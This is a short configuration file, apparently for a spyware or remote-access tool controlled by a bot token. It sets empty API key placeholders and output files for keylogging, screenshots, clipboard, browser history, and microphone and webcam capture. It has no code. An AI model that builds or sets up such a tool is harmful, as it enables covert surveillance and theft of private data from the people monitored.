BOT_TOKEN_API=""

OPENAI_API_KEY="sk-"

OUTPUT="."
OUTPUT_KEYLOGGER="keylogger.txt"
OUTPUT_SCREENSHOT="screenshot"
OUTPUT_CLIPBOARD="clipboard.txt"
OUTPUT_SYSTEMINFO="systeminfo.txt"
OUTPUT_NETWORKINFO="networkinfo.txt"
OUTPUT_MICROPHONE="microphone"
OUTPUT_BROWSERHISTORY="browser-history.txt"
OUTPUT_WEBCAM="webcam"